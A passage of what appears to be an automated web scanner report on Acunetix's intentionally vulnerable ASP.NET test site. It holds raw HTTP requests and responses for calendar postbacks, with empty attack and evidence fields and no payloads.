24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8211')" style="color:Black" title="June 25">25</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1135 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,135 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8215&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOKT0WtoIHgJTRBYBBgCAZE9iWdoIZGRkZlRVem08Tkg%2Buf80Z5e8w95qYCo%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwK%2BweTKBwK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ8XE%2BJA3i%2BStgorxBi%2Bq%2FRyayNwWA%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:48:59 GMT Content-Length: 12462
Response Body - size: 12,462 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOKT0WtoIHgJTRBYBBgCAZE9iWdoIZGRkZlRVem08Tkg+uf80Z5e8w95qYCo=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwK+weTKBwK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q8XE+JA3i+StgorxBi+q/RyayNwWA==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:White" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1123 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,123 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8617&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAzT8iktsIHgJTRBYBBgAAdOlGldsIZGRkYL0PyV5G6N4DAbyHR32fI6IR8pI%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwK%2F1PuMCQKqztDzBAKN1YajAgKo4JLYBgKo4JLYBgKo4Ib%2FDwKo4Ib%2FDwKo4LqSBwKo4LqSBwKo4K4pAqjgrikCqODCzQkCqODCzQkCqOD24AICqOD24AICqODqhwoCqODqhwoCqODe7AgCqODe7AgCqODyAwKo4PIDAo333KgDAo333KgDAo338M8MAo338M8MAo335OIFAo335OIFAo33mLkNAo33mLkNAo33jNwGAo33jNwGAo33oPMPAo33oPMPAo331JcHAo331JcHAo33yCoCjffIKgKN97ySDQKN97ySDQKN99C2BgKN99C2BgLmnaPeCQLmnaPeCQLmndfyAgLmndfyAgLmncuJCgLmncuJCgLmnf%2BsAwLmnf%2BsAwLmnZPDDALmnZPDDALmnYfmBQLmnYfmBQLmnbu9DQLmnbu9DQLmna%2FQBgLmna%2FQBgLmnYO5AwLmnYO5AwLmnbfcDALmnbfcDAL7pIHFDwL7pIHFDwL7pLWYBwL7pLWYBwL7pKk%2FAvukqT8C%2B6Td0wkC%2B6Td0wkC%2B6Tx9gIC%2B6Tx9gIC%2B6TljQoC%2B6TljQoC%2B6SZoAMC%2B6SZoAMC%2B6SNxwwC%2B6SNxwwC%2B6ThrAkC%2B6ThrAkC%2B6SVwwIC%2B6SVwwIC3Mvn6AUC3Mvn6AUC3Mubjw0C3Mubjw0C3MuPogYC3MuPogYA2LueDHo%2BKt977vtU9Y03NuqsYA%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:17:10 GMT Content-Length: 12556
Response Body - size: 12,556 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAzT8iktsIHgJTRBYBBgAAdOlGldsIZGRkYL0PyV5G6N4DAbyHR32fI6IR8pI=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwK/1PuMCQKqztDzBAKN1YajAgKo4JLYBgKo4JLYBgKo4Ib/DwKo4Ib/DwKo4LqSBwKo4LqSBwKo4K4pAqjgrikCqODCzQkCqODCzQkCqOD24AICqOD24AICqODqhwoCqODqhwoCqODe7AgCqODe7AgCqODyAwKo4PIDAo333KgDAo333KgDAo338M8MAo338M8MAo335OIFAo335OIFAo33mLkNAo33mLkNAo33jNwGAo33jNwGAo33oPMPAo33oPMPAo331JcHAo331JcHAo33yCoCjffIKgKN97ySDQKN97ySDQKN99C2BgKN99C2BgLmnaPeCQLmnaPeCQLmndfyAgLmndfyAgLmncuJCgLmncuJCgLmnf+sAwLmnf+sAwLmnZPDDALmnZPDDALmnYfmBQLmnYfmBQLmnbu9DQLmnbu9DQLmna/QBgLmna/QBgLmnYO5AwLmnYO5AwLmnbfcDALmnbfcDAL7pIHFDwL7pIHFDwL7pLWYBwL7pLWYBwL7pKk/AvukqT8C+6Td0wkC+6Td0wkC+6Tx9gIC+6Tx9gIC+6TljQoC+6TljQoC+6SZoAMC+6SZoAMC+6SNxwwC+6SNxwwC+6ThrAkC+6ThrAkC+6SVwwIC+6SVwwIC3Mvn6AUC3Mvn6AUC3Mubjw0C3Mubjw0C3MuPogYC3MuPogYA2LueDHo+Kt977vtU9Y03NuqsYA==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8582')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">August 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8644')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8611')" style="color:Black" title="July 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8612')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8613')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8614')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8615')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8616')" style="color:Black" title="August 04">4</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8617')" style="color:White" title="August 05">5</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8618')" style="color:Black" title="August 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8619')" style="color:Black" title="August 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8620')" style="color:Black" title="August 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8621')" style="color:Black" title="August 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8622')" style="color:Black" title="August 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8623')" style="color:Black" title="August 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8624')" style="color:Black" title="August 12">12</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8625')" style="color:Black" title="August 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8626')" style="color:Black" title="August 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8627')" style="color:Black" title="August 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8628')" style="color:Black" title="August 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8629')" style="color:Black" title="August 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8630')" style="color:Black" title="August 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8631')" style="color:Black" title="August 19">19</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8632')" style="color:Black" title="August 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8633')" style="color:Black" title="August 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8634')" style="color:Black" title="August 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8635')" style="color:Black" title="August 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8636')" style="color:Black" title="August 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8637')" style="color:Black" title="August 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8638')" style="color:Black" title="August 26">26</a></td></tr><tr><td align="center" style="width:14%;"><a 